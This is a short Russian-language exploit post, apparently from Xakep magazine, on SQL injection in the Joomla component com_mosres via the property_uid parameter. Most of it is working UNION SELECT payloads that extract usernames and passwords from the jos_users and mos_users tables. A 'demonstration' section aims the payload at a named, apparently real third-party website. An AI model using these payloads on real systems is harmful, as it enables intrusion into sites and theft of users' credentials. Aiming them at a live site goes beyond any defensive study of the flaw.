Xakep #305. Многошаговые SQL-инъекции
Программа: Joomla Component com_mosres
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «com_mosres» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL
code]
[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*
Демонстрация:
http://ahtopolbg.com/index.php?option=com_mosres&catID=1004®ID=2&task=
viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)
ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL
code]
[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*
